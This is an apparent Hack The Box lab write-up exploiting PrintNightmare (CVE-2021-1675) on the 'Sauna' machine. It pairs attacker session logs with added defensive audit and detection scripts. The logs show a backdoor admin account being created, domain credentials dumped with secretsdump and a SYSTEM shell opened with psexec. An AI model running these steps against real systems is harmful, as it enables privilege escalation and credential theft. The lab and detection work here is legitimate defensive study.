CVE-2021-1675


A vulnerability classified as critical was found in Microsoft Windows (operating system). Affected by this vulnerability is an unknown part of the Print Spooler component. The known impact is on confidentiality, integrity and availability. Low-privileged users are able to add a printer while supplying a malicious driver for it, which results in escalation of privileges to SYSTEM-level access.

Overview of CVE-2021-1675/CVE-2021-34527

The vulnerability takes advantage of the Windows-native Print Spooler service, which is enabled by default on all Windows machines (servers and endpoints).

*evil-winrm* ps c:\Users\FSmith\Documents> Get-Service Spooler
 
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

I can test for the Windows Spooler service locally, although there have been many different sources that indicate its presence.
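Beyond confirming that the service is running, a defender wants to know whether the host is still configured in a way this bug can abuse. The following audit is an added example, not code from the original writeup; it assumes an elevated PowerShell session on the host being checked and reads the Point and Print policy values from Microsoft's mitigation guidance.

```powershell
# Added example, not part of the original writeup: audit one host's exposure to
# CVE-2021-1675 / CVE-2021-34527 (Spooler state plus the Point and Print policy
# values from Microsoft's mitigation guidance). Assumes an elevated session on the host.
$PnPKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PolicyValue([string]$Path, [string]$Name) {
    # Returns $null when the key or value does not exist (policy not configured)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-PrintNightmareExposure {
    $findings = @()

    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $spooler) {
        $findings += 'Spooler service not installed; no exposure via this service'
        return $findings
    }
    if ($spooler.Status -eq 'Running') {
        $findings += "Spooler is running (StartType: $($spooler.StartType)); disable it on domain controllers and on hosts that never print"
    }

    # 0 re-opens non-admin driver installation; 1 (the default after the August 2021 updates) restricts it to administrators
    $restrict = Get-PolicyValue $PnPKey 'RestrictDriverInstallationToAdministrators'
    if ($restrict -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators = 0: non-admins may install printer drivers'
    } elseif ($null -eq $restrict) {
        $findings += 'RestrictDriverInstallationToAdministrators not set: relies on the patched default (1); set it explicitly'
    }

    # Either of these set to 1 removes the warning/elevation prompt for Point and Print driver installs
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        if ((Get-PolicyValue $PnPKey $name) -eq 1) {
            $findings += "$name = 1: Point and Print installs drivers without elevation"
        }
    }

    if ($findings.Count -eq 0) { $findings += 'No weak Spooler / Point and Print settings found' }
    return $findings
}

Test-PrintNightmareExposure | ForEach-Object { Write-Output "[*] $_" }
```

This checks configuration only, not patch level; a host that reports clean settings still needs the July/August 2021 cumulative updates installed before it is out of scope for this CVE.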

Exploit (PrintNightmare)


Invoke-Nightmare.ps1 is a PowerShell implementation of the PrintNightmare LPE exploit for CVE-2021-1675.

Exploitation


*evil-winrm* ps c:\Users\FSmith\Documents> upload Invoke-Nightmare.ps1 C:\Users\FSmith\Documents\Invoke-Nightmare.ps1
info: Uploading Invoke-Nightmare.ps1 to C:\Users\FSmith\Documents\Invoke-Nightmare.ps1
 
data: 238080 bytes of 238080 bytes copied
 
info: Upload successful!
 
*evil-winrm* ps c:\Users\FSmith\Documents> . .\Invoke-Nightmare.ps1

I first uploaded the exploit script to the target system using the existing WinRM session. I also imported it into the current PS session.

*evil-winrm* ps c:\Users\FSmith\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at c:\Users\FSmith\AppData\Local\Temp\nightmare.dll
[+] using pdriverpath = "c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from c:\Users\FSmith\AppData\Local\Temp\nightmare.dll

Upon executing the exploit PowerShell cmdlet, a local admin user is created: adm1n:P@ssw0rd.
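The run above leaves three kinds of host-side evidence: an account-creation and group-membership pair in the Security log, driver-install events in the PrintService log, and a DLL copied into the spooler's driver directory. The following collector is an added example, not code from the original writeup; it assumes an elevated session on the target and that the Microsoft-Windows-PrintService/Operational log is enabled, which it is not by default.

```powershell
# Added example, not part of the original writeup: collect the host-side artefacts a
# run like the one above leaves behind. Assumes an elevated session on the target and
# that the PrintService/Operational log is enabled (off by default; enable it with
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true).
function Get-EventFields([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event) {
    # Flatten <EventData><Data Name=...> into a hashtable for readable output
    $fields = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    return $fields
}

function Get-PrintNightmareArtefacts([datetime]$Since = (Get-Date).AddHours(-24)) {
    $hits = @()

    # Security log: 4720 = user account created, 4732 = member added to a security-enabled local group
    $sec = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $Since } -ErrorAction SilentlyContinue
    foreach ($e in $sec) {
        $f = Get-EventFields $e
        $what = if ($e.Id -eq 4720) { "account created: $($f['TargetUserName'])" }
                else { "member $($f['MemberSid']) added to $($f['TargetUserName'])" }
        $hits += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'Security'; Id = $e.Id; Detail = "$what by $($f['SubjectUserName'])" }
    }

    # PrintService/Operational: 316 = printer driver added or updated, 808 = spooler failed to load a plug-in module
    $prn = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 808; StartTime = $Since } -ErrorAction SilentlyContinue
    foreach ($e in $prn) {
        $hits += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'PrintService'; Id = $e.Id; Detail = ($e.Message -split "`n")[0] }
    }

    # Directory the spooler copies installed x64 drivers into; a DLL written here alongside the events above is the dropped driver
    $driverDir = Join-Path $env:SystemRoot 'System32\spool\drivers\x64\3'
    Get-ChildItem -Path $driverDir -Filter *.dll -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $Since } |
        ForEach-Object { $hits += [pscustomobject]@{ Time = $_.LastWriteTime; Source = 'DriverDir'; Id = $null; Detail = $_.FullName } }

    return $hits | Sort-Object Time
}

Get-PrintNightmareArtefacts | Format-Table -AutoSize
```

A 4720 followed within seconds by a 4732 into Administrators, with a 316 driver event and a fresh DLL in the driver directory at the same timestamp, is the pattern to alert on; a 316 with no matching legitimate printer deployment is worth a look on its own.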

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ evil-winrm -i sauna.egotistical-bank.local -u adm1n -p 'P@ssw0rd'
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\adm1n\Documents> whoami /groups
 
GROUP INFORMATION
-----------------
 
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Successfully connected via WinRM to the target system as the newly created adm1n user. As the output above shows, the user is part of the Administrators group.

Hashdump


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-secretsdump 'adm1n:P@ssw0rd@SAUNA.EGOTISTICAL-BANK.LOCAL' -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Target system bootKey: 0x6d261a4763682dbf58336ec3dc7ff268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
[*] DPAPI_SYSTEM 
[*] NL$KM 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

Domain Level Compromise

Shelldrop


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-psexec 'adm1n:P@ssw0rd@SAUNA.EGOTISTICAL-BANK.LOCAL' -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file hiFKMvny.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service XuRq on 10.10.10.175.....
[*] Starting service XuRq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
SAUNA
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::17a
   ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
   ipv4 address. . . . . . . . . . . : 10.10.10.175
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise